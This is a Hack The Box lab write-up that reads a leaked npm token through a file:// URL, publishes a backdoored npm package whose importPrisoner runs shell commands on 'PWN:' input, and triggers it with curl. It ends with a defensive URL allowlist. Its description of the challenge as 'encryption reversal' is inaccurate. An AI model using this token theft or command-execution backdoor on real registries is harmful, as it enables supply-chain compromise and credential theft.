HackTheBox Prison Pipeline Writeup

Explore the basics of cybersecurity in the Prison Pipeline challenge on Hack The Box. This medium-level challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

My challenge IP and port: 94.237.60.154:32828

The Prisoner Importer uses curl under the hood (“Curl under the hood”), so a file:// URL can be submitted as the record URL:

file:///home/node/.npmrc

Click on Import Prisoner Record. The response includes the contents of .npmrc:

//localhost:4873/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="

Add an entry to the hosts file:

94.237.60.154 registry.prison-pipeline.htb

cd challenge/prisoner-db
nano .npmrc

Replace the registry host in .npmrc, keeping the leaked token:

//registry.prison-pipeline.htb:32828/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="

Clear the npm cache, confirm the token authenticates against the registry, then open index.js:

npm cache clean --force
npm whoami --registry=http://registry.prison-pipeline.htb:32828
nano index.js

Backdoor added to importPrisoner in index.js:

    async importPrisoner(url) {
        // implement backdoor
        const child_process = require('child_process');
        if (url.includes('PWN:')) {
            try {
                let cmd = url.replace('PWN:', '');
                let output = child_process.execSync(cmd).toString();
                return output;
            }
            catch (error) {
                return 'PWN: Error executing command.';
            }
        }        
        ...SNIP...
    }

Bump the version in package.json:

nano package.json

"version": "1.0.1",

Publish the modified package, wait a few seconds, then trigger the backdoor through the import endpoint:

npm publish --registry=http://registry.prison-pipeline.htb:32828
sleep 5
curl -X POST 'http://94.237.60.154:32828/api/prisoners/import' -H 'Content-Type: application/json' -d '{"url": "PWN:/readflag"}'

Summary

The Prison Pipeline Challenge on Hack The Box is a medium-level challenge focused on encryption reversal and file handling. It involves interacting with a private npm registry and exploiting the importPrisoner function in the prisoner-db package by implementing a backdoor. The backdoor executes system commands when a URL starting with PWN: is provided. The challenge guides you through setting up the registry, modifying the package to include the backdoor, updating the version, and publishing the malicious package. Finally, it demonstrates triggering the backdoor by making an HTTP request to execute a command.
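
A defensive counterpart to the first step of the walkthrough, as an added example that is not part of the original post or the challenge's code: a scheme and host allowlist the importer could apply before handing a URL to curl. The function names are hypothetical, and the sample URLs are constructed apart from the file:// path and registry host shown above.

```javascript
// Added example: URL allowlist for an importer that passes user input to curl.
// validateImportUrl and isInternalIPv4 are hypothetical names, not challenge code.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// True for unspecified, loopback, private and link-local IPv4 literals.
function isInternalIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]);
  const b = Number(m[2]);
  return a === 0 || a === 10 || a === 127 ||
    (a === 169 && b === 254) ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168);
}

function validateImportUrl(input) {
  if (typeof input !== 'string') return { ok: false, reason: 'not a string' };
  let url;
  try {
    // The WHATWG parser lowercases the scheme and normalises numeric hosts,
    // so "http://2130706433/" is seen here as 127.0.0.1.
    url = new URL(input);
  } catch (err) {
    return { ok: false, reason: 'unparseable URL' };
  }
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) {
    return { ok: false, reason: `scheme ${url.protocol} not allowed` };
  }
  if (url.username || url.password) {
    return { ok: false, reason: 'credentials in URL' };
  }
  const host = url.hostname.replace(/\.$/, '');
  // IPv6 literals keep their brackets in url.hostname; this sketch rejects
  // them all. Names that resolve to internal addresses need a DNS-level check.
  if (host === 'localhost' || host.endsWith('.localhost') ||
      host.startsWith('[') || isInternalIPv4(host)) {
    return { ok: false, reason: 'internal host' };
  }
  return { ok: true, url: url.href };
}

// Constructed sample inputs, plus the file:// path and registry host from above.
for (const u of ['file:///home/node/.npmrc', 'http://localhost:4873/',
                 'http://2130706433/', 'https://example.com/record.xml']) {
  console.log(u, '->', JSON.stringify(validateImportUrl(u)));
}
```

Pairing the check with curl's own `--proto =http,https` and `--proto-redir =http,https` options keeps a redirect from switching to another scheme after validation.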

This post is licensed under CC BY 4.0 by the author.